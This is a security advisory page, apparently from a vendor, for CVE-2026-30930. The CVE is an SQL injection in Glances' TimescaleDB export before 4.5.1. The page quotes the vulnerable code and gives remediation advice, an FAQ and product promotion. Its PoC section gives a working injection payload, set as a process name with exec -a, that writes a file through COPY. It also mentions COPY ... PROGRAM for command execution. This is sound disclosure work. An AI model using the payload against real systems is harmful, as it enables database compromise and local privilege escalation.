CVE-2026-30930

CVE-2026-30930 is a high-severity SQL injection vulnerability in Glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1.

Summary

The TimescaleDB export module constructs SQL queries using string concatenation with unsanitized system monitoring data. The normalize() method wraps string values in single quotes but does not escape embedded single quotes, making SQL injection trivial via attacker-controlled data such as process names, filesystem mount points, network interface names, or container names.

Root Cause: The normalize() function uses f"'{value}'" for string values without escaping single quotes within the value. The resulting strings are concatenated into INSERT queries via string formatting and executed directly with cur.execute(), no parameterized queries are used.

Affected Code

  • File: glances/exports/glances_timescaledb/init.py, lines 79-93 (normalize function)
def normalize(self, value):
    """Normalize the value to be exportable to TimescaleDB."""
    if value is None:
        return 'NULL'
    if isinstance(value, bool):
        return str(value).upper()
    if isinstance(value, (list, tuple)):
        # Special case for list of one boolean
        if len(value) == 1 and isinstance(value[0], bool):
            return str(value[0]).upper()
        return ', '.join([f"'{v}'" for v in value])
    if isinstance(value, str):
        return f"'{value}'"  # <-- NO ESCAPING of single quotes within value

    return f"{value}"
  • File: glances/exports/glances_timescaledb/init.py, lines 201-205 (query construction)
# Insert the data
insert_list = [f"({','.join(i)})" for i in values_list]
insert_query = f"INSERT INTO {plugin} VALUES {','.join(insert_list)};"
logger.debug(f"Insert data into table: {insert_query}")
try:
    cur.execute(insert_query)  # <-- Direct execution of concatenated SQL

PoC

  • As a normal user, create a process with the name containing the SQL Injection payload:
exec -a "x'); COPY (SELECT version()) TO '/tmp/sqli_proof.txt' --"   python3 -c 'import time; [sum(range(500000)) or time.sleep(0.01) for _ in iter(int, 1)]'
  • Start Glances with TimescaleDB export as root user:
glances --export timescaledb --export-process-filter ".*" --time 5 --stdout cpu
  • Observe that sqli_proof.txt is created in /tmp directory.

Impact

  • Data Destruction: DROP TABLE, DELETE, TRUNCATE operations against the TimescaleDB database.
  • Data Exfiltration: Using COPY ... TO or subqueries to extract data from other tables.
  • Potential RCE: Via PostgreSQL extensions like COPY ... PROGRAM which executes OS commands.
  • Privilege Escalation: Any local user who can create a process with a crafted name can inject SQL into the database, potentially compromising the entire PostgreSQL instance.

Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access. Typical impact: data disclosure or modification.

Affected versions

Glances (< 4.5.1)

Security releases

Glances → 4.5.1 (pip)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade Glances to 4.5.1 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-30930? CVE-2026-30930 is a high-severity SQL injection vulnerability in Glances (pip), affecting versions < 4.5.1. It is fixed in 4.5.1. Untrusted input alters a database query, allowing the attacker to read or modify data the query was not intended to access.
  2. Which versions of Glances are affected by CVE-2026-30930? Glances (pip) versions < 4.5.1 is affected.
  3. Is there a fix for CVE-2026-30930? Yes. CVE-2026-30930 is fixed in 4.5.1. Upgrade to this version or later.
  4. Is CVE-2026-30930 exploitable, and should I be worried? Whether CVE-2026-30930 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-30930 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-30930? Upgrade Glances to 4.5.1 or later.

Other vulnerabilities in Glances

CVE-2026-53925CVE-2026-46611CVE-2026-46608CVE-2026-46607CVE-2026-46606

Stop the waste.
Protect your environment with Kodem.